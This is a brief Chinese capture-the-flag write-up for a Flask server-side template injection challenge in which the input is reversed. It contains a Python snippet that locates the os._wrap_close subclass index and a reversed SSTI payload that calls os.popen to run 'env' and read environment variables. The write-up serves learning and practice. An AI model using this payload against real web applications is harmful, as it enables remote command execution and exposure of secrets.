ssti-倒序
页面内容要求get一个name经过测试,只对语句进行倒序
# flask-SSTI之查询subclasses子类位置
with open('1.txt', 'r') as f:
file = f.read().split(", ")
for i in range(0, len(file)):
if file[i] == "<class 'os._wrap_close'>":
print(i)
break
查到os在132同时flag不在flag文件中
猜测flag在env中
payload:
}})(daer.)'vne'(]'nepop'[__slabolg__.__tini__.]231[)(__sessalcbus__.__esab__.__ssalc__.''{{